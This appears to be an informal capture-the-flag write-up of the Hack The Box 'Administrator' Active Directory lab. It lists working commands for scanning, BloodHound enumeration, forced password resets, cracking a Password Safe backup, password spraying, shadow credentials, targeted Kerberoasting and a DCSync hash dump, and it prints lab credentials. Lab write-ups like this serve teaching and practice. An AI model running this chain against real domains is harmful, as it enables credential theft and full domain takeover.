Target host IP Address: 10.129.23.175

Given Credential:

Username: Olivia Password: ichliebedich

Command: sudo nmap -sCV -p21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49668,57808,58502,58507,58529,58532 -Pn -n --min-rate 5000 -oA ./recon/detaild 10.129.23.175

Result(Removed useless data):
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-11-20 00:31:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 19 12:33:01 2025 -- 1 IP address (1 host up) scanned in 87.50 seconds
Port Scan Result

 

Info

1. ftp service is running

2. AD domain is administrator.htb

3. winrm network service is running

4. SMB servie is running

 

Add a ip address and domain name to /etc/hosts file

Command: echo "10.129.23.175 administrator.htb dc01 dc01.administrator.htb" | sudo tee -a /etc/hosts

 

Let's check what we can with given credential

 

We can access ftp, ldap and winrm service

 

Run a bloodhound to collect ldap data with netexec

Command: netexec ldap administrator.htb --dns-server 10.129.23.175 -u 'olivia' -p 'ichliebedich' --bloodhound -c All

 

 

Running bloodhound

If you didn't install it refer here: https://bloodhound.specterops.io/get-started/quickstart/community-edition-quickstart

 

Olivia user has genericall permission to michael user

 

Michael user can change benjamin user password

 

 

Ok! we don't no how to get an administrative user account but let's do that until we can

 

Login as olivia and change michael user password to test123

 

Log in as michael

I tried to change benjamin password by using net user command but it couldn't works

 

I used These commands to change benjamin password

$UserPassword = ConvertTo-SecureString 'test123' -AsPlainText -Force

Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword

*Set-DomainUserPassword function is in powerview.ps1. so at first, you need to import powerview script

 

Benjamin user password's changed

 

it works well

 

FTP server has Backup.psafe3 file

 

I get it and crack a psafe3 file's password

Command: hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt

 

Access a DB with cracked password

 

You can get a password just double click it

 

Passwords
UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
UXLCI5iETUsIBoFVTj8yQFKoHjXmb
WwANQWnmJnGV07WQN8bMS7FMAbjNur

 

I tried password spray and only one user successed

emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

 

 

Emily user has genericwrite permission to ethan user (when it gonna finish......)

 

GenericWrite permission to user, we can do shadow credential and Targeted Kerberoast attack

 

Targeted Kerberoast attack: set an account enable Do not pre kerberoast authentication

shadow credential attack: add a our public key to msDS-KeyCredentialsLink

 

We gonna do shadow credential attack because if i do targeted kerberoast attack, we should crack it...

 

1. Get an certification

Command: pywhisker -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --target ethan --action add

(If you don't have pywhisker, type it "pipx install pywhisker")

 

2. Try to......... Failed. go back to targeted kerboroasting

https://github.com/dirkjanm/PKINITtools

 

GitHub - dirkjanm/PKINITtools: Tools for Kerberos PKINIT and relaying to AD CS

Tools for Kerberos PKINIT and relaying to AD CS. Contribute to dirkjanm/PKINITtools development by creating an account on GitHub.

github.com

 

We've got a ethan user's kerberoase hash

Command: python3 targetedKerberoast.py -v -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --request-user ethan --only-abuse

you can get files from here: https://github.com/ShutdownRepo/targetedKerberoast.git

 

 

crack it

command: hashcat hash /usr/share/wordlists/rockyou.txt 

Password: limpbizkit

 

we can't log in with it but ldap is working

 

Wow! this user has DCSync permission!

 

We obtained all user NTLM Hash from DC's NTDS file

Command: crackmapexec smb administrator.htb -u ethan -p limpbizkit --ntds

 

Log in as administrator

+ Recent posts